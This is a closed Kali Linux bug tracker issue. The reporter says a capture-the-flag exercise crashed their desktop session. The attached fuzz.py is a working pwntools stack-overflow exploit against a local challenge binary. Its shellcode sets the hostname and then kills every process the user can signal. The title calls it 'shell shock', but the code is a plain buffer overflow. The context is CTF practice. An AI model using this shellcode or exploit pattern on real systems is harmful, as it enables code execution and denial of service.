View Issue Details

ID: 0006310
Project: Kali Linux
Category: General Bug
View Status: public
Last Update: 2021-09-14 20:15
Reporter: OverRide0x
Assigned To:
Priority: normal
Severity: minor
Reproducibility: always
Status: closed
Resolution: suspended
Product Version: 2020.1
Summary: 0006310: can inject shell shock through vulnerable app to close the session and login again
Description

While working on a vulnerable challenge, I by accident made my Kali crash, exit the session and log in again.

Steps To Reproduce

You will only need to start the fuzzer.py script with Python.

Look into the source and change the app dir for the vuln app called leak.

After running it, my Kali output a file called core; you will also see it in the uploaded files.

Attached Files
core (1,830,912 bytes)
fuzz.py (509 bytes)   
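from pwn import *
import time

# Start the local challenge binary; change this path to where "leak" lives.
sh = process('/home/abdallah/Desktop/htb/JET/leak')
print(sh.recvuntil(b"Oops, I'm leaking! "))
base = sh.recvuntil(b"\n")
print(base[:-1])
# The binary prints an address in hex; it is appended to the payload below.
rip = int(base[:-1],16)

# Number of bytes placed before the 8-byte address.
payload_len = 72

# x86-64 shellcode: issues syscall 0xaa (sethostname) with "Rooted !",
# then kill(-1, SIGKILL). The second syscall kills every process the
# current user may signal, which ends the desktop session.
buf = b"\xb0\xaa\x49\xb8\x52\x6f\x6f\x74\x65\x64\x20\x21\x41\x50\x48\x89\xe7\x40\xb6\x08\x0f\x05\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05"

buf_len = len(buf)
padding = b"A"*(payload_len-buf_len)

payload = buf + padding + p64(rip)

time.sleep(1)
sh.send(payload)
sh.interactive()
sh.close()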
leak (9,112 bytes)

Activities

g0tmi1k

2021-09-14 20:15

administrator   ~0015166

This report has been filed against an old version of Kali. We will be closing this ticket due to inactivity.
Please could you see if you are able to replicate this issue with the latest version of Kali Linux (https://www.kali.org/get-kali/)?
If you are still facing the same problem, feel free to re-open the ticket. If you choose to do this, could you provide more information to the issue you are facing, and also give information about your setup?
For more information, please read: https://kali.training/topic/filing-a-good-bug-report/

Issue History

Date Modified Username Field Change
2020-04-20 13:41 OverRide0x New Issue
2020-04-20 13:41 OverRide0x Issue generated from: 0006262
2020-12-01 10:48 g0tmi1k Priority urgent => normal
2020-12-01 10:50 g0tmi1k Severity crash => minor
2021-09-14 20:15 g0tmi1k Status new => closed
2021-09-14 20:15 g0tmi1k Resolution open => suspended
2021-09-14 20:15 g0tmi1k Note Added: 0015166